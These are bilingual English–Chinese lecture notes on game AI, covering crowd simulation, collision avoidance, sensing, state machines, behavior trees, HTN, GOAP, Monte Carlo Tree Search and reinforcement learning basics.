    • Separation

      分离

    • Cohesion

      凝聚

    • Alignment

      对齐

    webp

    Easy to implement, but not suitable to simulate complex behavior rules.

    ​易于实现,但不适合模拟复杂的行为规则。

    Macroscopic Models

    ​宏观模型

    Simulate crowd motion from a macro perspective

    ​从宏观角度模拟人群运动

    • Treat the crowd as a unified and continuous entity

      将人群视为统一且连续的实体(避免逐个计算影响性能)

    • Control motions with potential field or fluid dynamics

      用势场或流体动力学控制运动

    • Does not consider interactions between individualsand the environment in individual level

      不考虑个体与环境在个体层面上的相互作用

    webp

    Mesoscopic Models

    ​中观模型

    Simulate crowd motion taking care of both details and the whole

    ​模拟人群运动,兼顾细节和整体

    • Divide the crowd into groups

      将人群分成几组

    • Deals with interactions between groups and individuals in each group

      处理群体之间以及每个群体中个人之间的互动

    • combinations of microscopic models and formation rules or psychological models

      微观模型与形成规则或心理模型的组合

    webp

    Collision Avoidance-Force-based Models

    ​基于防撞力的模型

    • A mixture of socio-psychological and physical forces influencing the behavior in a crowd

      影响人群行为的社会心理和物理力量的混合

    • The actual movement of an individual depends on the desired velocity and its interaction with the environment

      个人的实际运动取决于所需速度及其与环境的相互作用

    • Can simulate dynamical features of escape crowd panic

      可以模拟逃离人群恐慌的动态特征

    webp

    Pros:

    ​优点:

    • can be extended to simulate more emergent behaviors of human crowds

      可以扩展以模拟更多人群突发行为

    Cons:

    ​缺点:

    • Similar to physics simulation, simulation step should be small enough

      与物理模拟类似,模拟步骤应该足够小

    webp

    Collision Avoidance-Velocity-based models

    ​碰撞避免-基于速度的模型

    Consider the neighbor information to make decisions in velocity space

    ​考虑邻居信息以在速度空间中做出决策

    • able to simulate in local space

      能够在局部空间中进行模拟

    • applied to collision avoidance

      应用于碰撞避免

    Reciprocal Velocity obstacle methods-Current standard collision avoidance algorithms

    ​相互速度障碍方法-当前标准碰撞避免算法

    • Velocity Obstacle (VO)

      速度障碍 (VO)

    • Reciprocal Velocity Obstacle (RVO)

      相互速度障碍 (RVO)

    • Optimal Reciprocal Collision Avoidance (ORCA)

      最佳相互碰撞避免 (ORCA)

    webp

    Velocity obstacle (VO)

    ​速度障碍 (VO)

    • Calculate its own dodge velocity, assuming other agent is unresponsive

      假设其他代理没有响应,计算自己的躲避速度

    • Appropriate for static and unresponsive obstacles

      适用于静态和无响应的障碍物

    • Overshoot

      超调

    • Causes oscillation between two agents attempting to avoid each other

      导致两个试图相互避开的代理之间发生振荡

    webp

    Reciprocal Velocity Obstacle (RVO)

    ​相互速度障碍 (RVO)

    • Assuming the other agent is using the same decision process (mutually cooperating)

      假设其他代理使用相同的决策过程(相互合作)

    • Both sides move half way out of the way ofa collision

      双方都向半路移动以避免碰撞

    • Only guarantees no oscillation and avoidance for two agents

      仅保证两个代理不会发生振荡和避免碰撞

    Optimal Reciprocal Collision Avoidance (ORCA)

    ​最佳相互碰撞避免 (ORCA)

    webp

    Sensing

    ​传感

    Sensing or Perception

    ​传感或感知

    webp

    Internal Information

    ​内部信息

    • Information of the agent itself

      agent 本身的信息

      • Position

        位置

      • HP

        生命值

      • Armor status

        护甲状态

      • Buff status

        增益状态

    • Can be accessed freely

      可自由访问

    Static Spatial information

    ​静态空间信息

    webp

    • Navigation Data

      导航数据

    • Tactical Map

      战术地图

    • Smart Object

      智能对象

    • Cover Point

      掩护点

    Dynamic Spatial information (1/2) - influence Map

    ​动态空间信息(1/2)- 影响力地图

    webp

    Dynamic Spatial Information (2/2) - Game Objects

    ​动态空间信息 (2/2) - 游戏对象

    • Information being sensed from a character

      从角色感知到的信息

    • Multiple character information can exist for a single character as it can be sensed by multiple agents

      单个角色可以存在多个角色信息,因为它可以被多个代理感知

    • Usually contains:

      通常包含:

      • Game Object lD

        游戏对象 ID

      • Visibility

        可见性

      • Last Sensed Method

        最后感知的方法

      • Last Sensed Position

        最后感知的位置

    Sensing Simulation

    ​传感模拟

    • Light, sound, and odor travels in space

      光、声音和气味在空间中传播

    • Have max traveling range

      具有最大传播范围

    • Attenuates in space and time with different patterns

      以不同的模式在空间和时间中衰减

      • Sight is blocked by obstacles

        视线被障碍物阻挡

      • Smelling ranges shrinks over time

        嗅觉范围随时间缩小

    • Radiating field can simulate sensing signals

      辐射场可以模拟传感信号

      • Can be simplified as Influence Map

        可以简化为影响图

      • Agents covered by the field can sense the information

        场覆盖的代理可以感知信息

    webp

    Classic Decision Making Algorithms

    ​经典决策算法

    Decision Making Algorithms

    ​决策算法

    • Finite State Machine

      有限状态机

    • Behavior Tree

      行为树

    • Hierarchical Tasks Network

      分层任务网络

    • Goal Oriented Action Planning

      目标导向行动规划

    • Monte Carlo Tree Search

      蒙特卡洛树搜索

    • Deep Learning

      深度学习

    Finite State Machine

    ​有限状态机

    • Change from one State to another according to some Conditions

      根据某些条件从一个状态变为另一个状态

    • The change from one state to another is called a Transition

      从一个状态到另一个状态的改变称为转换

    webp

    webp

    ​游戏 AI 经典案例——吃豆人。

    Finite State Machine - Pros & Cons

    ​有限状态机 - 优点和缺点

    Pros:

    ​优点:

    • Easy to implement

      易于实现

    • Easy to understand

      易于理解

    • Very fast to deal with simple case

      处理简单情况非常快

    Cons:

    ​缺点:

    • Maintainability is bad, especially add or remove state

      可维护性差,尤其是添加或删除状态

    • Reusability is bad, can’t used in other projects or characters

      可重用性差,不能用于其他项目或角色

    • Scalability is bad, hard to modify for complicated case

      可扩展性差,复杂情况下难以修改

    webp

    Hierarchical Finite State Machine (HFSM)

    ​分层有限状态机 (HFSM)

    Tradeoff between reactivity and modularity

    ​反应性和模块化之间的权衡

    • Reactivity: the ability to quickly and efficiently react to changes

      反应性:快速高效地对变化做出反应的能力

    • Modularity: the degree to which a system’s components may be separated into building blocks, and recombined

      模块化:系统组件可分离成构建块并重新组合的程度

    webp

    Behavior Tree (BT)

    Behavior Tree

    Focus on state abstraction and transition conditions

    ​关注状态抽象和转换条件

    webp

    Similar to human thinking:

    ​类似于人类的思维:

    • If ghost close, run away

      如果鬼靠近,就逃跑

    • But if I’m powerful, chase it

      但如果我很强大,就去追它

    • Otherwise, eating

      否则,就吃

    webp

    Behavior Tree - Execution Nodes

    ​行为树 - 执行节点

    Execution node (leaf node)

    ​执行节点(叶节点)

    • Condition node

      条件节点

    • Action node

      动作节点

    webp

    Behavior Tree - Control Nodes

    ​行为树-控制节点

    Control flow node (internal node)

    ​控制流节点(内部节点)

    • Control flow determined by the return value of child nodes

      控制流由子节点的返回值决定

    • Each node has a return value which is success failure or running

      每个节点都有一个返回值,即成功、失败或正在运行

    webp

    Control Node-Sequence (1/2)

    ​控制节点顺序 (1/2)

    • Order

      顺序

      • Execute children from left to right

        从左到右执行子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • until one child returns Failure or Running then return value accordingly

        直到一个子节点返回失败或正在运行,然后相应地返回值

      • or all children return Success, then return Success

        或所有子节点都返回成功,然后返回成功

    • lf Stop and Return Running

      如果停止并返回正在运行

      • the next execution will start from the running action

        下一次执行将从正在运行的操作开始

    webp

    Control Node-Sequence (2/2)

    Sequence

    ​序列

    • Allows designers to make a “plan”

      允许设计师制定“计划”

    webp

    Control Node-Selector (1/2)

    ​控制节点选择器 (1/2)

    • Order

      顺序

      • Execute children from left to right

        从左到右执行子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • until one child returns Success or Running, then return value accordingly

        直到一个子节点返回 Success 或 Running,然后相应地返回值

      • or all children return Failure, then return Failure

        或所有子节点都返回 Failure,然后返回 Failure

    • If Stop and Return Runningthe next execution will start from the runningaction

      如果 Stop 并 Return Running,则下一次执行将从 running 操作开始

    webp

    Control Node-Selector (2/2)

    ​控制节点选择器 (2/2)

    Selector

    ​选择器

    • Could select one action to do response to different environment

      可以选择一个动作来响应不同的环境

    • Could do the right thing according to priority

      可以根据优先级做正确的事情

    webp

    Control Node- Parallel (1/2)

    ​控制节点 - 并行 (1/2)

    • Order

      顺序

      • Logically execute all children simultaneously

        逻辑上同时执行所有子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • Return Success when at least M childnodes (between 1 and N) have succeeded

        当至少 M 个子节点(介于 1 和 N 之间)成功时返回成功

      • Return Failure when at least N - M + 1 child nodes (between 1 and N) have failed

        当至少 N - M + 1 个子节点(介于 1 和 N 之间)失败时返回失败

      • Otherwise return Running

        否则返回正在运行

    • If Stop and Return Running

      如果停止并返回正在运行

    • the next execution will start from the running actions

      下一次执行将从正在运行的操作开始

    webp

    Control Node - Parallel (2/2)

    ​控制节点 - 并行 (2/2)

    Parallel

    ​并行

    • Could do multiple things “at the same time”

      可以同时做多件事

    webp

    Behavior Tree

    ​行为树

    Execution nodes

    ​执行节点

    • Action

      操作

    • Condition

      条件

    Control flow nodes

    ​控制流节点

    • Sequence

      序列

    • Selector

      选择器

    • Parallel

      并行

    Node TypeSymbolSucceedsFailsRunning
    SequencewebpIf all children succeedlf one child failsIf one child returns Running
    SelectorwebpIf one child succeedsIf all children failIf one child returns Running
    ParallelwebpIf ≥ M children succeedIf > N - M children failelse
    ConditionwebpUpon completionIf impossible to completeDuring completion
    Actionwebplf trueIf falseNever

    Tick a Behavior Tree

    ​勾选行为树

    • The tick of BT is like thinking

      BT 的勾选就像思考

    • Every tick start from root node

      每次勾选都从根节点开始

    • Go through different nodes from up to down, left to right

      从上到下、从左到右遍历不同的节点

    • Each node must return failure, success or running

      每个节点必须返回失败、成功或正在运行

    webp

    Behavior Tree-Decorator (1/2)

    ​行为树装饰器 (1/2)

    Decorator

    ​装饰器

    • A special kind of control node with a single child node

      一种特殊的控制节点,只有一个子节点

    • Usually some behavior pattern which is commonly used

      通常是一些常用的行为模式

    webp

    • For example, some common policies:
      • Loop execution
      • Execute once
      • Timer
      • Time Limiter
      • Value Modifier
      • Etc.

    Behavior Tree - Decorator (2/2)

    ​行为树 - 装饰器 (2/2)

    Decorator

    ​装饰器

    • Example: Use timer to implement “patrol”

      示例:使用计时器实现“巡逻”

    webp

    Behavior Tree-Precondition

    ​行为树-前提条件

    Simplify behavior tree structure with preconditions

    ​使用前提条件简化行为树结构

    webp

    Behavior Tree-Blackboard

    ​行为树-黑板

    Blackboard: the memory of behavior tree

    ​黑板:行为树的记忆

    webp

    Behavior Tree - Pros

    ​行为树 - 优点

    • Modular, Hierarchical organization

      模块化、分层组织

      • each subtree of a BT can be seen as a module, with a standard interface given by the return statuses

        BT 的每个子树都可以看作一个模块,具有由返回状态给出的标准接口

    • Human readable

      人类可读

    • Easy to maintain

      易于维护

      • Modification only affect parts of tree

        修改仅影响树的部分

    webp

    • Reactivity

      反应性

      • Think every tick to quickly change behavior according to environment

        思考每一次滴答,根据环境快速改变行为

    • Easy to Debug

      易于调试

      • Every tick is a whole decision making process, so that it is easy to debug

        每一次滴答都是一个完整的决策过程,因此易于调试

    webp

    Behavior Tree - Cons

    ​行为树 - 缺点

    Cons

    ​缺点

    • Each tick starts from root node which costs much more

      每次更新都从根节点开始,成本更高

    • The more reactive, the more condition to be checked andthe more costs per tick

      反应性越高,需要检查的条件就越多,每次更新的成本就越高

    Upcoming: Al Planning and Goals

    ​即将推出:人工智能规划和目标

    To make the Al more deliberative, game designers introduced the Al Planning technique to improve the planning ability of Al

    ​为了让人工智能更具深思熟虑,游戏设计师引入了人工智能规划技术来提高人工智能的规划能力

    Al Planning:

    ​人工智能规划:

    • Manage a set of actions

      管理一组动作

    • A planner make a plan according tothe initial world state

      规划者根据初始世界状态制定计划

    webp

    Reference

    Steering & Sensing

    Crowd Simulation

    Classical Decision Making Algorithms

    第十七节:游戏引擎 Gameplay 玩法系统:高级 AI

    Adavanced Artificial Intelligence

    ​高级 AI

    • Hierarchical Tasks Network

      分层任务网络

    • Goal-Oriented Action Planning

      目标导向行动规划

    • Monte Carlo Tree Search

      蒙特卡洛树搜索

    • Machine Learning Basic

      机器学习基础

    • Build Advanced Game Al

      构建高级游戏人工智能

    Hierarchical Tasks Network

    ​层次任务网络

    Overview

    HTN assumes there are many Hierarchical tasks

    ​HTN 假设存在许多分层任务

    webp

    Make a Plan like Human

    ​像人类一样制定计划

    Hierarchical:

    ​分层:

    • people in real world usually make their plan hierarchically

      现实世界中的人们通常分层制定计划

    webp

    ​为了完成 Take a class,我可能需要做出的 Method。

    HTN Framework (1/2)

    ​HTN 框架

    World state

    ​世界状态

    • Contains a bunch of properties

      包含一系列属性

    • Input to planner, reflect the status of world

      输入到规划器,反映世界的状态

    • It’s a Subject World View in Al Brain

      它是人工智能大脑中的主体世界观

    Sensors

    ​传感器

    • Perceive changes of environment and modify world state

      感知环境变化并修改世界状态

    • It’s more like Perception

      它更像是感知

    webp

    HTN Framework (2/2)

    HTN Domain

    ​HTN 域

    • Load from asset

      从资产加载

    • Describe the relationship of hierarchical tasks

      描述分层任务的关系

    Planner

    ​规划器

    • Make a plan from World State and HTN Domain

      根据世界状态和 HTN 域制定计划

    Plan Runner

    ​计划运行器

    • Running the plan

      运行计划

    • Update the world state after the task

      任务完成后更新世界状态

    webp

    HTN Task Types

    ​HTN 任务类型

    Two types of Tasks

    ​两种类型的任务

    • Primitive Task

      原始任务

    • Compound Task

      复合任务

    webp

    Primitive Task (1/2)

    ​原始任务 (1/2)

    • Preconditions

      前提条件

      • Determine whether an action could be executed

        确定是否可以执行某个操作

      • Check whether properties of game world being satisfied

        检查游戏世界的属性是否得到满足

    • Action

      操作

      • Determine what action the primitive task executes

        确定原始任务执行什么操作

    • Effects

      效果

      • Describe how the primitive task modify the game world state properties

        描述原始任务如何修改游戏世界状态属性

    webp

    webp

    • 前提条件:有解药
    • 操作:使用解药
    • 效果:解除负面状态,消耗解药

    Compound Task (1/2)

    ​复合任务 (1/2)

    Compound Tasks

    ​复合任务

    • Contain several methods

      包含多种方法

    • Methods have different priority

      方法具有不同的优先级

    • Each method has preconditions

      每种方法都有先决条件

    Method

    ​方法

    • contains a chain of sub-Tasks

      包含一系列子任务

    • Sub-task could be a primitive task or a compound task

      子任务可以是原始任务或复合任务

    webp

    webp

    解毒任务:

    • 有足够材料——制作解药
    • 有足够钱——买解药
    • 最后使用解药解毒

    HTN Domain

    webp

    webp

    Planning

    Step 1

    • Start from the root task

      从根任务开始

    • Choose the method satisfying the precondition in order

      按顺序选择满足前提条件的方法

    webp

    Step 2

    • Decompose the method to tasks

      将方法分解为任务

    • Check precondition in order

      按顺序检查前提条件

    • Decompose the task if it is a compound task

      如果任务是复合任务,则将其分解

    webp

    Step 2 (For primitive tasks)

    ​第 2 步(针对原始任务)

    • Assume all action will be succeed, update “world state” in temporary memory

      假设所有操作都会成功,在临时内存中更新“世界状态”

    • World state has a duplicated copy in planning phase for scratch paper

      世界状态在规划阶段有一份草稿纸的副本

    webp

    Step 2 (For primitive tasks)

    ​第 2 步(针对原始任务)

    • go back and select a new method if precondition is not satisfied

      如果先决条件不满足,则返回并选择新方法

    webp

    Step 2 (For compound task)

    ​第 2 步(针对复合任务)

    • select the next method if precondition is not satisfied

      如果先决条件不满足,则选择下一个方法

    webp

    Step 3

    • Repeat step 2 until no more task needs to be done

      重复步骤 2,直到不再需要完成任务

    • The final plan contains only primitive tasks

      最终计划仅包含原始任务

    webp

    webp

    Run plan

    ​运行计划

    Run plan

    ​运行计划

    • Execute tasks in order

      按顺序执行任务

    • Stop until all tasks succeed, or one task failed

      停止直到所有任务成功,或一个任务失败

    Execute task

    ​执行任务

    • Check precondition and return failure if not satisfied

      检查先决条件,如果不满足则返回失败

    • Execute action

      执行操作

      • if succeed -> update world state and return success

        如果成功 -> 更新世界状态并返回成功

      • if failed -> return failure

        如果失败 -> 返回失败

    webp

    Replan

    ​重新规划

    There are three situations that the agent could start plan

    ​代理可以在三种情况下启动计划

    • Not have a plan

      没有计划

    • The current plan is finished or failed

      当前计划已完成或失败

    • The World State changes via its sensor

      世界状态通过其传感器发生变化

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • HTN is similar with BT, and it is more high-level

      HTN 与 BT 类似,但更高级

    • It outputs a plan which has long-term effect

      它输出具有长期效果的计划

    • It would be faster compared to the BT in the same case

      在相同情况下,它比 BT 更快

    Cons:

    ​缺点:

    • Player’s behavior is unpredictable, so the tasks may be easy to fail

      玩家行为不可预测,因此任务可能很容易失败

    • The World state and the effect of tasks are challenging for designers

      世界状态和任务效果对设计师来说具有挑战性

    Goal-Oriented Action Planning

    ​以目标为导向的行动计划

    Goal-Oriented Action Planning (GOAP)

    ​目标导向行动计划 (GOAP)

    • GOAP is more automated

      GOAP 更加自动化

    • It takes backward planning rather than forward

      它需要向后规划,而不是向前规划

    webp

    Structure

    ​结构

    Sensors and World State

    ​传感器和世界状态

    • Similar to HTN

      类似于 HTN

    Goal set

    ​目标集

    • All available goals

      所有可用目标

    Action set

    ​行动集

    • All available actions

      所有可用行动

    Planning

    ​规划

    • Output sequence of actions

      输出行动序列

    webp

    Goal Set

    ​目标集

    • Precondition decides which goal will be selected

      前提条件决定选择哪个目标

    • Priority decide witch goal should be selected among all the possible goals

      优先级决定在所有可能的目标中选择哪个目标

    • Each goal can be presented as a Collection of States

      每个目标都可以表示为状态集合

    webp

    Goal Selection

    ​目标选择

    webp

    Action Set

    ​动作集

    Action in GOAP is with precondition, effect and cost

    ​GOAP 中的动作具有前提条件、效果和成本

    • Precondition: in which state, character can do this action

      前提条件:角色在哪种状态下可以执行此动作

    • Effect: after the action is done, how does the world statechanges

      效果:执行动作后,世界状态如何变化

    • Cost: defined by developer, used as a weight to make theplan which has the lowest cost

      成本:由开发人员定义,用作制定成本最低的计划的权重

    webp

    Backward Planning Like a Human

    ​像人类一样进行反向规划

    • When making a plan, start from goal state

      制定计划时,从目标状态开始

    webp

    Goal:解毒

    反向规划:使用解药-花钱买解药-拜访商店并付款

    Planning

    ​规划

    Step 1

    • Check goals according to priority

      根据优先级检查目标

    • Find the first goal of which precondition is satisfied

      找到第一个满足先决条件的目标

    webp

    Step 2

    • Compare the target state with world state to find unsatisfied goal

      将目标状态与世界状态进行比较,找出未满足的目标

    • Set all unsatisfied states of the goal into a stack

      将目标的所有未满足状态放入堆栈中

    webp

    Step 3

    • Check the top unsatisfied state from the stack

      从堆栈中检查顶部未满足的状态

    • Select an action from action set which could satisfy the chosen state

      从操作集中选择一个可以满足所选状态的操作

    • Pop the state if it is satisfied by the selected action

      如果所选操作满足该状态,则弹出该状态

    webp

    Step 4

    • Push action to plan stack

      将操作推送到计划堆栈

    • Check precondition of corresponded action

      检查相应操作的前提条件

    • If precondition is not satisfied, push state to stack of unsatisfied states

      如果前提条件不满足,则将状态推送到不满足状态堆栈

    webp

    Build States-Action-Cost Graph

    ​构建状态-动作-成本图

    Can be turned into a path planning problem

    ​可以转化为路径规划问题(动态规划

    • Node: combination of states

      节点:状态组合

    • Edge: Action

      边:动作

    • Distance: Cost

      距离:成本

    Search direction

    ​搜索方向

    • Start node: states of the goal

      起始节点:目标状态

    • End node: current states

      结束节点:当前状态

    webp

    ​根据目标解毒,从当前状态找到成本最低的路线。

    The Lowest Cost Path

    ​最低成本路径

    Can use A* or other shortest path algorithms

    ​可以使用 A* 或其他最短路径算法

    • Heuristics can be represented with number of unsatisfied states

      启发式算法可以用不满足状态的数量来表示

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • Compared with HTN, GOAP plans is more dynamic

      与 HTN 相比,GOAP 计划更具动态性

    • Decoupling goals and behaviors

      将目标和行为分离

    • HTN can easily make precondition/effect mismatching mistakes

      HTN 很容易犯前提条件 / 效果不匹配的错误

    Cons:

    ​缺点:

    • In a single Al system, the runtime planning would be slower than BT/FSM/HTN

      在单个 AI 系统中,运行时规划会比 BT/FSM/HTN 慢

    • Also needs a well-represented world state and action effect

      还需要一个具有良好表现的世界状态和行动效果

    ​蒙特卡洛树搜索

    Monte Carlo Tree Search

    MCTS is another automated planning, and it behaves more diversely

    ​MCTS 是另一种自动化规划,其行为更加多样化

    webp

    ​AlphaGo 就用到了蒙特卡洛树搜索。

    webp

    Like playing chess, simulate millions possible moves in mind and choose the“best” step

    ​就像下棋一样,在脑海中模拟数百万种可能的走法,并选择“最佳”一步

    Monte Carlo Method

    ​蒙特卡洛方法

    • A broad class of computational algorithms that rely on repeated random sampling to obtain numerical results

      一大类依赖重复随机抽样来获得数值结果的计算算法

    webp

    Monte Carlo Tree Search

    webp

    ​对于当前棋局状态,给出可能的合理行为,求 best move。

    States and Actions

    ​状态和动作

    State

    ​状态

    • The state of game

      游戏状态

    • Represented by a node

      用节点表示

    webp

    Action

    ​动作

    • One step operation of Al

      人工智能的一步操作

    • Represented by an edge

      用边表示

    webp

    States Transfer

    Transfer state from A to B by action

    webp

    State Space

    ​状态空间

    A Tree Structured State space:

    ​树结构状态空间:

    The set of states that can be reached from the current state after a possible sequence of actions

    ​从当前状态经过一系列可能的操作后可以到达的状态集

    webp

    NOTICE: Rebuild the State Space for Each Move

    ​注意:每次移动都要重建状态空间

    webp

    Simulation: Playing a Game in Mind Quickly

    ​模拟:快速在脑海中玩游戏

    Simulation

    ​模拟

    • Run from the state node according to the Default Policy to produce an outcome

      根据默认策略从状态节点运行以产生结果

    In the case of Go

    ​围棋的情况

    • Apply random moves from the state until the game is over

      从状态中应用随机动作直到游戏结束

    • Return 1 (win) or 0 (loss) depending on the result

      根据结果返回 1(赢)或 0(输)

    Default Policy

    ​默认策略

    • A meaningful but quick rule or neural network to playthe game

      一个有意义但快速的规则或神经网络来玩游戏

    webp

    How to evaluate the states?

    ​如何评估状态?

    Evaluation Factors

    ​评估因素

    • Q: Accumulation of Simulation Results

      Q:模拟结果的累积

    • N: Number of simulations

      N:模拟次数

    Simulation Results and Number ofsimulations Maybe not direct simulation but from child nodes

    ​模拟结果和模拟次数可能不是直接模拟,而是来自子节点

    webp

    Backpropagate

    ​反向传播

    Propagate influence of child state back parent state

    ​将子状态的影响传播回父状态

    • $Q_{FatherNode}=Q_{FatherNode} +Q_{BackchildNode}$

    • $N_{node} = N_{node} + 1$

    • Repeat it until reaching the root

      重复此操作直至到达根节点

    webp

    lteration Steps

    ​迭代步骤

    • Selection: select the most urgent “expandable” node

      选择:选择最紧急的“可扩展”节点

    • Expansion:expand the tree by selecting an action

      扩展:通过选择操作扩展树

    • Simulation: simulate from the new node and produce an outcome

      模拟:从新节点进行模拟并产生结果

    • Backpropagate: backpropagate the outcome of simulation from the new node

      反向传播:从新节点反向传播模拟结果

    webp

    Search in “Infinite” State Space

    ​在“无限”状态空间中搜索

    Generally impossible to traverse the state space

    ​通常不可能遍历状态空间

    • We prioritize exploring the most promising regions in state space

      我们优先探索状态空间中最有希望的区域

    • Pre-set a computational budget and stop exploring the state space when the budget is reached

      预设计算预算,并在达到预算时停止探索状态空间

    Selection-Expandable Node

    ​选择可扩展节点

    Select the most urgent “expandable” node

    ​选择最紧急的“可扩展”节点

    “expandable" node

    ​“可扩展”节点

    • Nonterminal state and has unvisited children

      非终止状态且有未访问的子节点

    • Example:

      示例:

    webp

    Selection-Exploitation and Exploration

    ​选择-开发和探索

    Exploitation

    ​开发

    • Look in areas which appear to be promising

      寻找看似有希望的领域

    • Select the child which has high Q/N value

      选择具有高 Q/N 值的子项

    webp

    Exploration

    ​探索

    • Look in areas that have not been well sampled yet

      查看尚未充分采样的区域

    • Select the child which has low number of visits

      选择访问次数较少的子项

    webp

    webp

    UCB (Upper Confidence Bounds)

    ​UCB(置信上限)

    How to balance exploration and exploitation?

    ​如何平衡探索和开发?

    • Use UCB (Upper Confidence Bounds) formula

      使用 UCB(置信上限)公式

    • $UCB_j$ :the UCB value of the node $j$

      $UCB_j$:节点 $j$ 的 UCB 值

    • $Q_j$: the total reward of all playouts that passed through node $j$

      $Q_j$:经过节点 $j$ 的所有播放的总奖励

    • $N_j$ : the number of times node $j$ has been visited

      $N_j$:节点 $j$ 被访问的次数

    • $N$ : the number of times the parent node of node $j$ has been visited

      $N$:节点 $j$ 的父节点被访问的次数

    • $C$: a constant, adiusted to lower or increase the amount of exploration performe

      $C$:一个常数,调整以降低或增加探索执行量

    webp

    Selection

    ​选择

    How to select the most urgent expandable node

    ​如何选择最紧急的可扩展节点

    • Always Search from the root node

      始终从根节点搜索

    • Find the highest UCB value child node (promising child) of current node

      查找当前节点的 UCB 值最高的子节点(有希望的子节点)

    • Set promising child as current node

      将有希望的子节点设置为当前节点

    • Iterate above steps until current node is expandable. Set current node as selected node

      迭代上述步骤,直到当前节点可扩展。将当前节点设置为选定节点

    webp

    Expansion

    ​扩展

    Expansion

    ​扩展

    • One or more new child nodes are added to selected node, according to the available actions

      根据可用操作,向选定节点添加一个或多个新子节点

    • The value of child node is unknown

      子节点的值未知

    webp

    Simulation and Backpropagation

    ​模拟和反向传播

    webp

    The End Condition

    ​结束条件

    Computational budget

    ​计算预算

    • Memory size (the number of nodes)

      内存大小(节点数)

    • Computation time

      计算时间

    webp

    How to Choose the Best Move?

    ​如何选择最佳移动?

    The “best” child node of current state node

    ​当前状态节点的“最佳”子节点

    • Max child: Select the root child with the highest Q-value

      最大子节点:选择具有最高 Q 值的根子节点

    • Robust child: Select the most visited root child

      稳健子节点:选择访问次数最多的根子节点

    • Max-Robust child: Select the root child with both the highest visit count and the highest reward. lf none exist, then continue searching until an acceptable visit count is achieved

      最大稳健子节点:选择访问次数和奖励都最高的根子节点。如果不存在,则继续搜索,直到达到可接受的访问次数。

    • Secure child: Select the child which maximises a lowerconfidence bound (LCB)

      安全子节点:选择最大化下置信区间 (LCB) 的子节点

    $$LCB_{j}=\frac{Q_j}{N_j}-C\cdot\sqrt{\frac{2\ln(N)}{N_j}}$$

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • MCTS agent behaves diverse

      MCTS 代理行为多样

    • Agent makes the decision totally by itself

      代理完全自行做出决策

    • Can solve the problem of large search space

      可以解决搜索空间大的问题

    Cons:

    ​缺点:

    • The action and state are hard to design for most real-time games

      对于大多数实时游戏来说,动作和状态很难设计

    • It is hard to model for most real-time games

      对于大多数实时游戏来说,很难建模

    Machine Learning Basic

    ​机器学习基础

    Machine Learning

    ​机器学习

    Four Types of Machine Learning

    ​机器学习的四种类型

    • Supervised learning

      监督学习

    • Unsupervised learning

      无监督学习

    • Semi-supervised learning

      半监督学习

    • Reinforcement learning

      强化学习

    webp

    ML Types: Supervised Learning

    ​ML 类型:监督学习

    • Learn from labeled data

      训练时提供标记数据

    webp

    ML Types: Unsupervised Learning

    ​ML 类型:无监督学习

    • Learn from unlabeled data

      从未标记的数据中学习

    webp

    ​无监督学习便于处理聚类问题。

    ML Types: Semi-supervised Learning

    ​ML 类型:半监督学习

    • Learn from a lot of unlabeled data and very scarce labeled data

      从大量未标记数据和非常稀少的标记数据中学习

    webp

    ML Types: Reinforcement learning

    ​ML 类型:强化学习

    • Learn from an interaction process with environment

      从与环境的交互过程中学习

    webp

    Reinforcement Learning

    ​强化学习

    Reinforcement learning (RL) is an area of machine learning concerned with how intelligent agents ought to take actions in an environment in order to maximize the notion of cumulative reward.

    强化学习 (RL) 是机器学习的一个领域,它关注智能代理如何在环境中采取行动,以最大化累积奖励的概念。

    • Trial-and-error search

      反复试验

    • The learner must discover which actions yield the most reward by trying them

      学习者必须通过尝试发现哪些行动能产生最大的奖励

    • Delayed reward

      延迟奖励

    • Actions may affect the immediate reward, thenext situation and all subsequent rewards

      行动可能会影响即时奖励、下一个情况和所有后续奖励

    Markov Decision Process-Basic Elements (1/4)

    ​马尔可夫决策过程-基本概念

    • Agent

      代理

      The learner and decision maker

      学习者和决策者

    • Environment

      环境

      The thing the agent interacts with, comprising everything outside the agent

      代理与之交互的事物,包括代理之外的一切

    webp

    Markov Decision Process-State (2/4)

    ​马尔可夫决策过程 - 状态 (2/4)

    State is the observation of the agent, and the data structure is designed by human

    ​状态是代理的观察,数据结构由人设计

    webp

    Markov Decision Process-Action (3/4)

    ​马尔可夫决策过程-行动 (3/4)

    Action is the minimal element the agent could behave in the game It is also designed by human

    ​行动是代理在游戏中可以表现的最小元素,它也是由人类设计的

    webp

    Markov Decision Process-Reward (4/4)

    ​马尔可夫决策过程-奖励 (4/4)

    A special signal the agent receives at each time step passing from environment to the agent

    ​代理在从环境传递到代理的每个时间步骤中收到的特殊信号

    webp

    MDP Mathematical Mode

    ​MDP 数学模式

    • Probability of transition

      转换概率

      The probability of transition from s to s’ after taking action a

      采取行动 a 后从 s 转换到 s’ 的概率

    $$p(s’|s, a)=P(S_t=s’|S_{t-1}=s, A_{t-1}=a)$$

    • Policy

      策略

      A mapping from states to probabilities of selecting each possible action

      从状态到选择每个可能行动的概率的映射

    $$\pi(a|s)=P(A_t=a|S_t=2)$$

    • Total reward

      总奖励

      The cumulative reward it receives in the long run

      从长远来看,它获得的累积奖励

    $$G_t=R_{t+1}+R_{t+2}+R_{t+3}+…+R_T$$

    $$G_t=R_{t+1}+\gamma R_{t+2}+\gamma^2R_{t+3}+…$$

    webp

    Policy

    ​策略

    A mapping from states to probabilities of selecting each possible action

    ​从状态到选择每个可能动作的概率的映射

    $$\pi(a|s)=P(A=a|S=s)$$

    webp

    Build Advanced Game AI

    ​构建高级游戏 AI

    Why Game Al needs Machine Learning

    ​为什么游戏 AI 需要机器学习

    It is notable that all previous methods actuallyneed human knowledge to design (include the cost of GOAP)

    ​值得注意的是,之前的方法实际上都需要人类知识来设计(包括 GOAP 的成本)

    But players always expect Al to be able to bothdeal with complicated game world and behave naturally and diversely

    ​但玩家总是希望 AI 能够既能应对复杂的游戏世界,又能表现得自然多样

    • Traditional methods is in limited space

      传统方法空间有限

    • Machine Learning create infinite possibilities

      机器学习创造无限可能

    webp

    Machine Learning Framework in Game

    ​游戏中的机器学习框架

    The framework of deploying a neural network to play an agent

    ​部署神经网络扮演代理的框架

    Observation:

    ​观察:

    • The Game State the Al could observe

      人工智能可以观察到的游戏状态

      • Vector feature

        矢量特征

      • Unit information

        单位信息

